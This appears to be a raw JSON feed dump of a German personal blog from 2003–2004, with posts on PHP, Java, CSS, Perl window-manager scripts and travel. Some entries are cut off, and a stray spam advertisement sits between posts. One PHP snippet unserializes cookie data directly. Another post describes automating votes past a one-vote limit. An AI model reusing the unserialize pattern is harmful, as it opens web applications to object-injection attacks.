So habe ich mir mal den Code der XML-RPC-Klasse angeschaut und habe dort eine Funktion error_log entdeckt. Diese Funktion ist in PHP eingebaut und sendet eine Fehlermeldung. Nach dem Studium der Dokumentation habe ich herausgefunden, dass die Fehlermeldungen damit in den Error-Log vom Apache geschrieben werden!
Also habe ich mir /var/log/apache2/error_log vorgenommen. Darin fand ich Fehlermeldungen des XML-Parsers, der sich ĂŒber ein invalid token beschwerte!
Nach lÀngerem Herumexperimentieren mit den Eingabewerten, fand ich heraus, dass der XML-Parser an einem nicht enkodierten Umlaut scheiterte.
Da ich Umlaute nicht mehr enkodiere, sondern einfach das entsprechende encoding=\"iso-8859-15\" Attribut setzte, kontrollierte ich zuerst den XML-Header, wie er von der XML-RPC-Klasse generiert wird. Dort fand ich dann auch den Fehler: es wird kein encoding Attribut erzeugt.
Warum werden nicht alle Umlaute etc. automatisch enkodiert, wenn kein encoding Attribut mitgeliefert wird?
Warum gibt es ein Debug-Flag, aber Fehlermeldungen werden trotzdem nicht ausgegeben sondern weiterhin nur nach /var/log/apache2/error_log geschrieben?
", "url": "https://blog.x-way.org/Coding/2004/04/13/Warum.html", "tags": ["Coding"], "date_published": "2004-04-13T18:36:15+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324020", "title": "RSS, TrackBack", "content_text": "Nun findet man hier auch diverse RSS-Feeds und es ist auch möglich mittels TrackBack seine Meinung mitzuteilen. Was ist RSS?TrackBack DevelopmentFeedsAlle SprachenAtom 0.3RSS 2.0RSS 0.92RSS 1.0DeutschAtom 0.3RSS 2.0RSS 0.92RSS 1.0FranzösischAtom 0.3RSS 2.0RSS 0.92RSS 1.0", "content_html": "Nun findet man hier auch diverse RSS-Feeds und es ist auch möglich mittels TrackBack seine Meinung mitzuteilen.
Feeds
Gestern habe ich Inkscape entdeckt. Inkscape ist ein Vektor-Graphikprogramm, das SVG als Dateiformat benutzt.
Das Programm lĂ€sst sich mit Macromedia Fireworks vergleichen, wennauch der Funktionsumfang noch nicht ganz so gross ist. So kann Inkscape nur nach PNG exportieren und unterstĂŒtzt keine Animationen. DafĂŒr ist IMHO die Vektorbearbeitung von Inkscape schon jetzt der von Fireworks ĂŒberlegen.
Nachdem ich auch das Tutorial gemacht habe, durfte ich feststellen, dass das Userinterface von Inkscape grösstenteils absolut top ist. So eine angenehme und einfache Handhabung habe ich bei einem Graphikprogramm bisher vergebens gesucht. Da kann selbst mein bisheriger Favorit Fireworks fast nicht mithalten.
", "url": "https://blog.x-way.org/Webdesign/2004/04/09/Inkscape.html", "tags": ["Webdesign"], "date_published": "2004-04-09T21:22:13+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324018", "title": "x-log v2.02c", "content_text": "So, nun sind auch die Erweiterungen, welche ich wĂ€hrend der letzten Woche offline geschrieben habe, mehr oder weniger erfolgreich integriert.ErwĂ€hnenswerte neue Features:Labels, einzelne EintrĂ€ge sind nun nicht mehr nur via detail.php?id=324018 erreichbar sondern auch via detail.php?label=x-log_v202c Archiv, wie schon gehabtmod_rewrite fĂŒr einzele EintrĂ€ge, dieser Eintrag ist auch erreichbar via http://waterwave.ch/weblog/324018 und http://waterwave.ch/weblog/x-log_v202cmod_rewrite fĂŒrs Archiv, archiv.php?jahr=2004 ist auch erreichbar via http://waterwave.ch/weblog/2004 und infolge der Verschachtelung von Catch-All-Expressions auch via http://www.waterwave.ch/weblog/2004/2003/0/0/9876/1234/2003/1/2/2004XHTML 1.0 Strict mit korrektem MIME-Type (application/xhtml+xml, falls vom Browser unterstĂŒtzt) fĂŒr alle EintrĂ€ge seit Jahresbeginn (mal schauen wie lange das so bleibt ;-)", "content_html": "So, nun sind auch die Erweiterungen, welche ich wĂ€hrend der letzten Woche offline geschrieben habe, mehr oder weniger erfolgreich integriert.
ErwÀhnenswerte neue Features:
La semaine derniĂšre j'ai passĂ© presque tous les jours, soirs et nuits au Satellite . Il y avait la fĂȘte de 20 ans de Satellite. Et puis le weekend il y avait des concerts vachement gĂ©nials.
", "url": "https://blog.x-way.org/Music/2004/04/08/Jouyeux_Anniversaire_Satellite.html", "tags": ["Music"], "date_published": "2004-04-08T15:44:19+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324016", "title": "Neue alte Features", "content_text": "Nun sind wieder ein paar alte Features zum Vorschein gekommen :-)Dabei hat mir PHP den Weg nicht gerade leicht gemacht. Angenommen, man will ein Array in einem Cookie speichern indem man serialize() und unserialize() benutzt, könnte folgender Code entstehen.function saveData ( $data ) { setcookie('cookiename', serialize($data), time()+3600*24*100);}function loadData () { return unserialize($_COOKIE['cookiename']);}Das funktioniert aber leider nicht. Damit es funktioniert muss noch stripslashes() benutzt werden.function saveData ( $data ) { setcookie('cookiename', serialize($data), time()+3600*24*100);}function loadData () { return unserialize(stripslashes($_COOKIE['cookiename']));}", "content_html": "Nun sind wieder ein paar alte Features zum Vorschein gekommen :-)
Dabei hat mir PHP den Weg nicht gerade leicht gemacht. Angenommen, man will ein Array in einem Cookie speichern indem man serialize() und unserialize() benutzt, könnte folgender Code entstehen.
function saveData ( $data ) { setcookie('cookiename', serialize($data), time()+3600*24*100);}function loadData () { return unserialize($_COOKIE['cookiename']);}
Das funktioniert aber leider nicht. Damit es funktioniert muss noch stripslashes() benutzt werden.
function saveData ( $data ) { setcookie('cookiename', serialize($data), time()+3600*24*100);}function loadData () { return unserialize(stripslashes($_COOKIE['cookiename']));}", "url": "https://blog.x-way.org/Coding/2004/03/28/Neue_alte_Features.html", "tags": ["Coding"], "date_published": "2004-03-28T01:18:46+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324015", "title": "Paris en nuit", "content_text": "Chez vowe.net j'ai trouvĂ© cette image exceptionelle de Paris.", "content_html": "Chez vowe.net j'ai trouvĂ© cette image exceptionelle de Paris.", "url": "https://blog.x-way.org/Misc/2004/03/27/Paris_en_nuit.html", "tags": ["Misc"], "date_published": "2004-03-27T21:45:26+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324014", "title": "Kochsche Kurve", "content_text": "Heute haben wir im Java-Programmieren mit GUI-Programmierung angefangen. Die Exercices waren simpel (Buttons erzeugen, ausrichten etc.), jedoch hatte es als Zusatzaufgabe noch die Kochsche Kurve.import java.awt.*;import java.awt.event.*;import javax.swing.*;/** * Kochsche Kurve * * @author Andreas Jaggi * @created 26. MĂ€rz 2004 * @version 1.0 */public class KochscheKurve extends JFrame { /** * Constructor for the KochscheKurve object */ public KochscheKurve() { setSize( 600, 600 ); setTitle( \"Die Kochsche Kurve\" ); } /** * Ăberladene \"interne\" Methode, die aufgerufen wird, wenn das Fenster neu * gezeichnet werden muss * * @param g Graphik-Objekt, auf dem gezeichnet wird */ public void paint( Graphics g ) { super.paint( g ); double x1; double x2; double x3; double y1; double y2; double y3; int depth = 13; x1 = 100; y1 = 400; x2 = 500; y2 = 400; x3 = ( x2 - x1 ) * Math.cos( -Math.PI / 3 ) - ( y2 - y1 ) * Math.sin( -Math.PI / 3 ) + x1; y3 = ( x2 - x1 ) * Math.sin( -Math.PI / 3 ) + ( y2 - y1 ) * Math.cos( -Math.PI / 3 ) + y1; koch( g, depth, x2, y2, x1, y1 ); koch( g, depth, x1, y1, x3, y3 ); koch( g, depth, x3, y3, x2, y2 ); } /** * Rekursive Funktion, welche den Fraktal zwischen zwei Punkten bis zu einer * bestimmten Tiefe zeichnet. * * @param g Graphik-Objekt, auf dem gezeichnet wird * @param depth Rekursionstiefe * @param x1 X-Koordinate des ersten Punktes * @param y1 Y-Koordinate des ersten Punktes * @param x2 X-Koordinate des zweiten Punktes * @param y2 X-Koordinate des zweiten Punktes */ public void koch( Graphics g, int depth, double x1, double y1, double x2, double y2 ) { double x13 = x1 + ( x2 - x1 ) / 3.0; double x23 = x1 + 2.0 * ( x2 - x1 ) / 3.0; double y13 = y1 + ( y2 - y1 ) / 3.0; double y23 = y1 + 2.0 * ( y2 - y1 ) / 3.0; double xd = ( x23 - x13 ) * Math.cos( -Math.PI / 3 ) - ( y23 - y13 ) * Math.sin( -Math.PI / 3 ) + x13; double yd = ( x23 - x13 ) * Math.sin( -Math.PI / 3 ) + ( y23 - y13 ) * Math.cos( -Math.PI / 3 ) + y13; if ( depth > 0 ) { koch( g, depth - 1, x1, y1, x13, y13 ); koch( g, depth - 1, x13, y13, xd, yd ); koch( g, depth - 1, xd, yd, x23, y23 ); koch( g, depth - 1, x23, y23, x2, y2 ); } else { g.drawLine( (int) x1, (int) y1, (int) x2, (int) y2 ); } } /** * The main program for the KochscheKurve class * * @param args The command line arguments */ public static void main( String[] args ) { KochscheKurve graf = new KochscheKurve(); graf.setVisible( true ); graf.addWindowListener( new WindowAdapter() { public void windowClosing( WindowEvent e ) { System.exit( 0 ); } } ); }}", "content_html": "
Heute haben wir im Java-Programmieren mit GUI-Programmierung angefangen. Die Exercices waren simpel (Buttons erzeugen, ausrichten etc.), jedoch hatte es als Zusatzaufgabe noch die Kochsche Kurve.
import java.awt.*;import java.awt.event.*;import javax.swing.*;/** * Kochsche Kurve * * @author Andreas Jaggi * @created 26. MĂ€rz 2004 * @version 1.0 */public class KochscheKurve extends JFrame { /** * Constructor for the KochscheKurve object */ public KochscheKurve() { setSize( 600, 600 ); setTitle( \"Die Kochsche Kurve\" ); } /** * Ăberladene \"interne\" Methode, die aufgerufen wird, wenn das Fenster neu * gezeichnet werden muss * * @param g Graphik-Objekt, auf dem gezeichnet wird */ public void paint( Graphics g ) { super.paint( g ); double x1; double x2; double x3; double y1; double y2; double y3; int depth = 13; x1 = 100; y1 = 400; x2 = 500; y2 = 400; x3 = ( x2 - x1 ) * Math.cos( -Math.PI / 3 ) - ( y2 - y1 ) * Math.sin( -Math.PI / 3 ) + x1; y3 = ( x2 - x1 ) * Math.sin( -Math.PI / 3 ) + ( y2 - y1 ) * Math.cos( -Math.PI / 3 ) + y1; koch( g, depth, x2, y2, x1, y1 ); koch( g, depth, x1, y1, x3, y3 ); koch( g, depth, x3, y3, x2, y2 ); } /** * Rekursive Funktion, welche den Fraktal zwischen zwei Punkten bis zu einer * bestimmten Tiefe zeichnet. * * @param g Graphik-Objekt, auf dem gezeichnet wird * @param depth Rekursionstiefe * @param x1 X-Koordinate des ersten Punktes * @param y1 Y-Koordinate des ersten Punktes * @param x2 X-Koordinate des zweiten Punktes * @param y2 X-Koordinate des zweiten Punktes */ public void koch( Graphics g, int depth, double x1, double y1, double x2, double y2 ) { double x13 = x1 + ( x2 - x1 ) / 3.0; double x23 = x1 + 2.0 * ( x2 - x1 ) / 3.0; double y13 = y1 + ( y2 - y1 ) / 3.0; double y23 = y1 + 2.0 * ( y2 - y1 ) / 3.0; double xd = ( x23 - x13 ) * Math.cos( -Math.PI / 3 ) - ( y23 - y13 ) * Math.sin( -Math.PI / 3 ) + x13; double yd = ( x23 - x13 ) * Math.sin( -Math.PI / 3 ) + ( y23 - y13 ) * Math.cos( -Math.PI / 3 ) + y13; if ( depth > 0 ) { koch( g, depth - 1, x1, y1, x13, y13 ); koch( g, depth - 1, x13, y13, xd, yd ); koch( g, depth - 1, xd, yd, x23, y23 ); koch( g, depth - 1, x23, y23, x2, y2 ); } else { g.drawLine( (int) x1, (int) y1, (int) x2, (int) y2 ); } } /** * The main program for the KochscheKurve class * * @param args The command line arguments */ public static void main( String[] args ) { KochscheKurve graf = new KochscheKurve(); graf.setVisible( true ); graf.addWindowListener( new WindowAdapter() { public void windowClosing( WindowEvent e ) { System.exit( 0 ); } } ); }}", "url": "https://blog.x-way.org/Coding/2004/03/26/Kochsche_Kurve.html", "tags": ["Coding"], "date_published": "2004-03-26T23:18:02+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324013", "title": "Rechnen mit CSS", "content_text": "Im Stylesheet dieser Seite findet sich unter anderem folgende Styledefinition:#rechts li a {\tdisplay: block;\tborder-bottom: 1px solid #FFFFFF;\twidth: 100% - 30px;\tpadding-left: 30px;}Diese macht, dass die Links im rechten Submenu auf der ganzen Breite funktionieren und nicht nur wenn man auf den Text klickt.Zuerst hatte ich die Weite auf 100% gesetzt. Jedoch hat der Mozilla wegen der 30px Padding noch 30px ausserhalb des Rahmens angezeigt. Mit overflow: hidden habe ich versucht das Problem zu lösen. Jedoch hat das nicht funktioniert, da es ja kein eigentlicher overflow ist.Schlussendlich bin ich durch ausprobieren von garantiert fehlerhaften Styledefinitionen auf die jetztige Lösung gekommen. NatĂŒrlich validiert das nun nicht mehr als korrektes CSS, aber es funktioniert :-)Da ich nun keine Windows-Maschine mehr habe, wĂ€re ich froh um Screenshots vom Submenu, wenn mit der Maus ĂŒber ein Link gefahren wird (a:hover).", "content_html": "
Im Stylesheet dieser Seite findet sich unter anderem folgende Styledefinition:
#rechts li a {\tdisplay: block;\tborder-bottom: 1px solid #FFFFFF;\twidth: 100% - 30px;\tpadding-left: 30px;}
Diese macht, dass die Links im rechten Submenu auf der ganzen Breite funktionieren und nicht nur wenn man auf den Text klickt.
Zuerst hatte ich die Weite auf 100% gesetzt. Jedoch hat der Mozilla wegen der 30px Padding noch 30px ausserhalb des Rahmens angezeigt. Mit overflow: hidden habe ich versucht das Problem zu lösen. Jedoch hat das nicht funktioniert, da es ja kein eigentlicher overflow ist.
Schlussendlich bin ich durch ausprobieren von garantiert fehlerhaften Styledefinitionen auf die jetztige Lösung gekommen. NatĂŒrlich validiert das nun nicht mehr als korrektes CSS, aber es funktioniert :-)
Da ich nun keine Windows-Maschine mehr habe, wĂ€re ich froh um Screenshots vom Submenu, wenn mit der Maus ĂŒber ein Link gefahren wird (a:hover).
", "url": "https://blog.x-way.org/Webdesign/2004/03/14/Rechnen_mit_CSS.html", "tags": ["Webdesign"], "date_published": "2004-03-14T12:43:22+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324012", "title": "125. Geburtstag von Albert Einstein", "content_text": ""Phantasie ist wichtiger als Wissen. Wissen ist begrenzt, Phantasie aber umfaĂt die ganze Welt."Albert Einstein (1879-1955)Mehr dazu bei heise", "content_html": ""Phantasie ist wichtiger als Wissen. Wissen ist begrenzt, Phantasie aber umfaĂt die ganze Welt."
Albert Einstein (1879-1955)
Mehr dazu bei heise
", "url": "https://blog.x-way.org/Misc/2004/03/14/125_Geburtstag_von_Albert_Einstein.html", "tags": ["Misc"], "date_published": "2004-03-14T12:16:49+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324011", "title": "x-log, trashed again", "content_text": ""Am liebsten erinnere ich mich an die Zukunft."Salvador DalĂ (1904-1989), span. surrealist. MalerWie schon angekĂŒndigt, habe ich wĂ€hrend den Semesterferien die PHP-Scripts, welche hier im Hintergrund ihre Arbeit tun, neu geschrieben. Bisher sind noch nicht alle Funktionen der alten Version implementiert. Es werden jedoch laufend neue Funktionen hinzugefĂŒgt.Mit dem alten Script verschwinden auch die alten Layouts, da hier nun ein neues Template-System werkelt. Aber keine Angst es werden neue Layouts kommen, denn dieser graue Kasten gefĂ€llt mir schon jetzt nicht mehr.", "content_html": ""Am liebsten erinnere ich mich an die Zukunft."
Salvador DalĂ (1904-1989), span. surrealist. Maler
Wie schon angekĂŒndigt, habe ich wĂ€hrend den Semesterferien die PHP-Scripts, welche hier im Hintergrund ihre Arbeit tun, neu geschrieben. Bisher sind noch nicht alle Funktionen der alten Version implementiert. Es werden jedoch laufend neue Funktionen hinzugefĂŒgt.
Mit dem alten Script verschwinden auch die alten Layouts, da hier nun ein neues Template-System werkelt. Aber keine Angst es werden neue Layouts kommen, denn dieser graue Kasten gefÀllt mir schon jetzt nicht mehr.
#!/usr/bin/perl## 2003 by x-way - http://waterwave.ch/weblog## Add this to your menu, if you have pekwm's dynamic menu support:## SubMenu = \"Backgrounds\" {# Entry { Actions = \"Dynamic /path/to/this/file /path/to/your/wallpapers\" }# }#use warnings \"all\";use strict;if($ARGV[0] eq '-set') { my $wallpaper = $ARGV[1]; open(PKCONF, \"<$ENV{HOME}/.pekwm/start\") or die \"Can't open ~/.pekwm/start\"; my @file = <PKCONF>; close(PKCONF); my @file2 = (); my $set = ''; foreach (@file) { s/^xsetbg -center \".*\"/xsetbg -center \"$wallpaper\"/gi; push(@file2, $_); if(index($_, 'xsetbg -center') == 0) { $set = $_; } }; if($set eq \"\") { push(@file2, \"xsetbg -center \\\"\".$wallpaper.\"\\\"\"); } open(PKCONF, \">$ENV{HOME}/.pekwm/start\") or die \"Can't write ~/.pekwm/start\"; print(PKCONF @file2); close(PKCONF);} else { print(\"Dynamic {\\n\"); for(my $i = 0; $i < scalar(@ARGV); $i++) { my $dir = $ARGV[$i]; opendir(DIR, \"$dir\") || die \"Can't opendir $dir: $!\"; my @backgrounds = grep { (! /^\\./) } readdir(DIR); closedir DIR; foreach my $x (@backgrounds) { my $y = $x; $y =~ s+.*/++g; if(! -d \"$dir/$x\") { $y =~ s/\\.[^\\.]*$//g; $y =~ s/(_|-)[0-9]{3,4}(x[0-9]{3,4}|)//g; $y =~ s/_/ /g; $y =~ s/%20/ /g; print(\"Entry = \\\"$y\\\" { Actions = \\\"Exec xsetbg -center \\\\\\\"$dir/$x\\\\\\\" && $0 -set \\\\\\\"$dir/$x\\\\\\\" \\\" }\\n\"); } else { print(\"Submenu = \\\"$y\\\" {\\nEntry { Actions = \\\"Dynamic $0 \\\\\\\"$dir/$x\\\\\\\" \\\" }\\n}\"); } } } print(\"}\\n\");}", "url": "https://blog.x-way.org/Linux/2004/01/11/pekwm_bgsetpl.html", "tags": ["Linux"], "date_published": "2004-01-11T14:07:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=323995", "title": "pekwm", "content_text": "Nachdem ich alle Kandidaten etwas getestet habe, bin ich bei pekwm hĂ€ngengeblieben.\"pewkm ist ein kleiner, schneller, funktioneller und flexibler Windowmanager, der versucht nett (hĂŒbsch) zu sein wĂ€hrend dem er klein bleibt.\"So wird er in der Doku beschrieben. Er besitzt viele Features: so kann man zum Beispiel damit wie beim pwm mehrere Fenster zusammenfassen.Das RootmenĂŒ, welches auf die linke (!) Maustaste belegt ist, lĂ€sst sich sehr gut anpassen, da es möglich ist, die MenĂŒeintrĂ€ge dynamisch zu generieren. Dieses Feature ist ideal, um meine Wallpaper ins MenĂŒ einzubinden, ohne fĂŒr jedes einen Eintrag schreiben zu mĂŒssen.So ist ein kleines Perl-Skript entstanden, das als Parameter Verzeichnisse mit Bilddateien entgegennimmt, diese rekursiv durchsucht, die gefundenen Bilder ins MenĂŒ integriert (die Dateinamen werden noch etwas beschönigt) und ihnen mittels xsetbg eine Handlung anzufĂŒgt.#!/usr/bin/perl## 2003 by x-way - http://waterwave.ch/weblog## Add this to your menu, if you have pekwm's dynamic menu support:## SubMenu = \"Backgrounds\" {# Entry { Actions = \"Dynamic /path/to/this/file /path/to/your/wallpapers\" }# }#use warnings \"all\";use strict;print(\"Dynamic {\\n\");for(my $i = 0; $i < scalar(@ARGV); $i++) { my $dir = $ARGV[$i]; opendir(DIR, \"$dir\") || die \"Can't opendir $dir: $!\"; my @backgrounds = grep { (! /^\\./) } readdir(DIR); closedir DIR; foreach my $x (@backgrounds) { my $y = $x; $y =~ s+.*/++g; if(! -d \"$dir/$x\") { $y =~ s/\\..*$//g; $y =~ s/_[0-9]{3,4}x[0-9]{3,4}//g; print(\"Entry = \\\"$y\\\" { Actions = \\\"Exec xsetbg -center $dir/$x \\\" }\\n\"); } else { print(\"Submenu = \\\"$y\\\" {\\nEntry { Actions = \\\"Dynamic $0 $dir/$x\\\" }\\n}\"); } }}print(\"}\\n\");", "content_html": "Nachdem ich alle Kandidaten etwas getestet habe, bin ich bei pekwm hĂ€ngengeblieben.
#!/usr/bin/perl## 2003 by x-way - http://waterwave.ch/weblog## Add this to your menu, if you have pekwm's dynamic menu support:## SubMenu = \"Backgrounds\" {# Entry { Actions = \"Dynamic /path/to/this/file /path/to/your/wallpapers\" }# }#use warnings \"all\";use strict;print(\"Dynamic {\\n\");for(my $i = 0; $i < scalar(@ARGV); $i++) { my $dir = $ARGV[$i]; opendir(DIR, \"$dir\") || die \"Can't opendir $dir: $!\"; my @backgrounds = grep { (! /^\\./) } readdir(DIR); closedir DIR; foreach my $x (@backgrounds) { my $y = $x; $y =~ s+.*/++g; if(! -d \"$dir/$x\") { $y =~ s/\\..*$//g; $y =~ s/_[0-9]{3,4}x[0-9]{3,4}//g; print(\"Entry = \\\"$y\\\" { Actions = \\\"Exec xsetbg -center $dir/$x \\\" }\\n\"); } else { print(\"Submenu = \\\"$y\\\" {\\nEntry { Actions = \\\"Dynamic $0 $dir/$x\\\" }\\n}\"); } }}print(\"}\\n\");", "url": "https://blog.x-way.org/Coding/2004/01/04/pekwm.html", "tags": ["Coding"], "date_published": "2004-01-04T01:28:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=323994", "title": "Roboclip", "content_text": "Ich hab heut Nachmittag kurz durchs Fernsehprogramm gezappt. Dabei bin ich bei Roboclip hĂ€ngen geblieben. Das ist eine automatisierte Sendung, welche Musikvideos abspielt. FĂŒr das abzuspielende Musikvideo kann man per Telefon, SMS oder Internet stimmen. Das hat mich als Internet-Junkie natĂŒrlich interessiert und ich musste das ausprobieren. Leider kann man fĂŒr ein Musikvideo nur einmal stimmen, aber um die einigermassen hörbaren Musikvideos abspielen zu lassen braucht es so rund 100 Stimmen. Die Stimmenregistrierung erfolgt mit einem PHP-Script, das Cookies verwendet. Da ich eine Veranlagung zum Experimentieren habe, hats nicht lange gedauert und ich habe nun ein kleines Shell-Skript, das mittels wget das Stimmen fĂŒr ein Musikvideo automatisiert.So ist es nun gekommen, dass \"Apocalyptica Feat. Nina Hagen - Seemann\" und \"Metallica - Frantic\", welche fast keine Stimmen hatten, plötzlich gerade nacheinander abgespielt wurden ;-) Danach war leider die Sendezeit von Roboclip zuende :-)", "content_html": "Ich hab heut Nachmittag kurz durchs Fernsehprogramm gezappt. Dabei bin ich bei Roboclip hĂ€ngen geblieben. Das ist eine automatisierte Sendung, welche Musikvideos abspielt. FĂŒr das abzuspielende Musikvideo kann man per Telefon, SMS oder Internet stimmen. Das hat mich als Internet-Junkie natĂŒrlich interessiert und ich musste das ausprobieren. Leider kann man fĂŒr ein Musikvideo nur einmal stimmen, aber um die einigermassen hörbaren Musikvideos abspielen zu lassen braucht es so rund 100 Stimmen. Die Stimmenregistrierung erfolgt mit einem PHP-Script, das Cookies verwendet. Da ich eine Veranlagung zum Experimentieren habe, hats nicht lange gedauert und ich habe nun ein kleines Shell-Skript, das mittels wget das Stimmen fĂŒr ein Musikvideo automatisiert.
Its really HERE!!Playfriends
is a new site to help you find someone in your area that is looking for the same thing you are,
with no strings attached; waiting for you to fulfill their needs and vice versus!!
Dont waste any more im=e.Go Now.
Just tell them what u are looking for, and presto, your= set up with exactly what u =ordered, and
youll be what they want, someone to pleasure until your completely content, and then u can find
someone else to do the same. Just tell us what u want, and well find it..
Tired of bad dates?!?,
Meet someone in your area tonight.
aterm -tr -sh 75 -rv +sb -tint blue- Farbiger Prompt
PS1='\\[\\033[1;30m\\][ \\[\\033[01;32m\\]\\u\\[\\033[0;37m\\] @ \\[\\033[01;32m\\]\\h \\[\\033[0;37m\\]: \\[\\033[01;34m\\]\\w\\[\\033[1;30m\\] ] \\[\\033[0;37m\\]\\$ \\[\\033[01;00m\\]'- Farbiges ls
alias ls=\"ls --color=auto\"- Farbtabelle fĂŒr die Shell: colors
PROMPT_COMMAND='echo -ne \"\\033]2;$USER@$HOSTNAME: $PWD ($_)\\007\"'", "url": "https://blog.x-way.org/Linux/2003/07/12/Bunt.html", "tags": ["Linux"], "date_published": "2003-07-12T13:51:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=323966", "title": "Ferien zum 2. und '3.' (RS), Zukunft", "content_text": "Nachdem ich erst gerade aus DĂ€nemark zurĂŒck bin, fahre ich in etwa 4 Stunden mit meiner Familie fĂŒr eine Woche in die Ferien nach BrĂŒssel. Gerade anschliessend beginnt dann die Rekrutenschule, welche am 24. Oktober endet. Am 20 Oktober beginnt das Studium an der EPFL, verpasse ich also schon zum Anfang was :-(", "content_html": "Nachdem ich erst gerade aus DĂ€nemark zurĂŒck bin, fahre ich in etwa 4 Stunden mit meiner Familie fĂŒr eine Woche in die Ferien nach BrĂŒssel. Gerade anschliessend beginnt dann die Rekrutenschule, welche am 24. Oktober endet. Am 20 Oktober beginnt das Studium an der EPFL, verpasse ich also schon zum Anfang was :-(", "url": "https://blog.x-way.org/Misc/2003/07/05/Ferien_zum_2_und_3_RS_Zukunft.html", "tags": ["Misc"], "date_published": "2003-07-05T00:12:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=323965", "title": "Guide to GNU/Linux Desktop Survival", "content_text": "Dank diesem reichhaltigen Guide habe ich es wieder geschafft, meinen Drucker zum Laufen zu bringen, nachdem ich es, wegen der nicht gemachten Dokumentation vom letzten mal, nochnicht geschafft hatte.", "content_html": "Dank diesem reichhaltigen Guide habe ich es wieder geschafft, meinen Drucker zum Laufen zu bringen, nachdem ich es, wegen der nicht gemachten Dokumentation vom letzten mal, nochnicht geschafft hatte.", "url": "https://blog.x-way.org/Linux/2003/07/04/Guide_to_GNULinux_Desktop_Survival.html", "tags": ["Linux"], "date_published": "2003-07-04T11:03:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=323964", "title": "back @ home", "content_text": "So, ich bin zurĂŒck aus DĂ€nemark. Es war schön und hatte sogar genĂŒgend Sonne, dass ich mir nen Sonnenbrand geholt habe.Besonders die 21-stĂŒndige RĂŒckreise war sehr abenteuerlich, da bei wirklich jedem Umsteigen alle ZĂŒge VerspĂ€tung hatten...Unsere RĂŒckreise startete ganz normal mit einer einstĂŒndigen Busfahrt von Faaborg nach Odense (14.04 bis ca. 15.00). In Odense sollte unser Zug um 16.04 fahren, damit wir in Kollding in den IC nach Hamburg wechseln konnten.Jedoch erfahren wir in Odense etwas vor 16 Uhr eher zufĂ€llig, dass der Zug nach Kollding so viel VerspĂ€tung hat, dass wir den IC nach Hamburg nicht mehr erreichen können. Unser erster Gedanke: Scheisse, nĂ€chster Zug erst in 24 Stunden.Da aber noch andere Passagiere in dieser Situation waren, hat ein dĂ€nischer \"Reiseleiter\" (er begleitete zwei Jugendliche aus Ohaio an den Bahnhof) mit dem Bahnpersonal ausgehandelt, dass die DĂ€nische Bahn ein Taxi bezahlt, das uns bis nach Kollding bringt, damit wir den IC nach Hamburg noch erreichen.Gut, das Taxi kommt, mittlerweile ist es schon 16.22 und der IC in Kollding fĂ€hrt um 16.47. Der Taxifahrer hat folgende Anweisung bekommen: 'Drive like hell!' und wir sind losgefahren.Als wir erst um ungefĂ€hr 17 Uhr in der NĂ€he von Kollding sind, entscheidet der Taxifahrer, dass wir zur nĂ€chsten Station fahren, wo der IC hĂ€lt, Flensburg (etwa 200km von Odense entfernt). Wir fahren nach Flensburg und haben dort etwa 10 Minuten vorsprung auf den Zug. Jedoch entscheidet der Taxifahrer weiterzufahren, da es vermutlich nicht möglich ist, in 10 Minuten von der Autobahn bis zum Bahnhof zu gelangen, und wenn wir dann dort wĂ€ren und den Zug verpasst hĂ€tten, so mĂŒssten wir noch viel mehr Zeit aufholen.Also rasen wir weiter, ĂŒber die Grenze, wo der Taxifahrer feststellt, dass er das erste mal mit dem Taxi in Deutschland ist. NĂ€chstes Ziel ist Hamburg (etwa 180 km von Flensburg entfernt). Dort wĂŒrde unser nĂ€chster Zug (CityNightLiner nach ZĂŒrich) um 20.19 fahren.Als wir auf NeumĂŒnster zufahren, haben wir 25 Minuten Vorsprung auf den Zug und der Taxifahrer entscheidet, hier zum Bahnhof zu fahren anstatt sich in Hamburg durch das stĂ€dtische Verkehrschaos zu zwĂ€ngen. Mittlerweile ist es fast 19 Uhr. Wir sind nun schon 3 Stunden Taxi gefahren, die DĂ€nische Bahn wird sich sicher ĂŒber die Rechnung freuen *bg*Wir finden den Bahnhof ziemlich leicht und die Leute staunen nicht schlecht, als sie ein dĂ€nisches Taxi sehen *g*Mit ein paar Minuten VerspĂ€tung fĂ€hrt der dĂ€nische IC dann ein und wir steigen endlich in den Zug ein, in dem wir schon seit 2,5 Stunden sein sollten.Mit einer kleinen VerspĂ€tung kommen wir in Hamburd-Dammtor an, was jedoch nicht weiter schlimm ist, da wir dort sowiese eine halbe Stunde Aufenthalt hĂ€tten.Um 20.24 kommt der CityNightLiner mit 5 Minuten VerspĂ€tung, die sich noch vergrössern werden. Wir beziehen unsere Sleeperette (= Liegesessel) und freuen uns, dass wir uns endlich etwas erholen können :-)Die Zugfahrt quer durch Deutschland verlĂ€uft wortwörtlich wie im Schlaf *g*Als wir jedoch am Morgen aufwachen kommt der Zug mit 20 Minuten VerspĂ€tung um 7.16 anstatt umd 6.56 in Basel an und wir verpassen unseren Zug, der um 7.04 gefahren ist.Nach einer Stunde rumhĂ€ngen im Bahnhof Basel, nehmen wir den Zug um 8.04 Richtung Bern, Thun, Spiez, Interlaken.Um 9.58 steige ich in Spiez aus dem Zug aus und warte auf meinen Anschlusszug der um 10.02 fahren sollte. Als um 10.03 immernoch kein Zug da ist, höre ich die Durchsage: \"Der Goldenpass Express nach Zweisimmen, planmĂ€ssige Abfahrt 10.02 folgt in circa 5 Minuten\"Nach etwa 10 Minuten kommt der Zug und ich beginne auch die letzte Etape meiner Heimreise. In Zweisimmen komme ich schliesslich mit 15 Minuten VerspĂ€tung um 10.55 an, was mir jedoch nichts mehr ausmacht, da ich keine weiteren AnschlusszĂŒge erreichen muss und nach 21 Stunden reisen sowieso nur noch in Bett fallen kann ;-)", "content_html": "So, ich bin zurĂŒck aus DĂ€nemark. Es war schön und hatte sogar genĂŒgend Sonne, dass ich mir nen Sonnenbrand geholt habe.
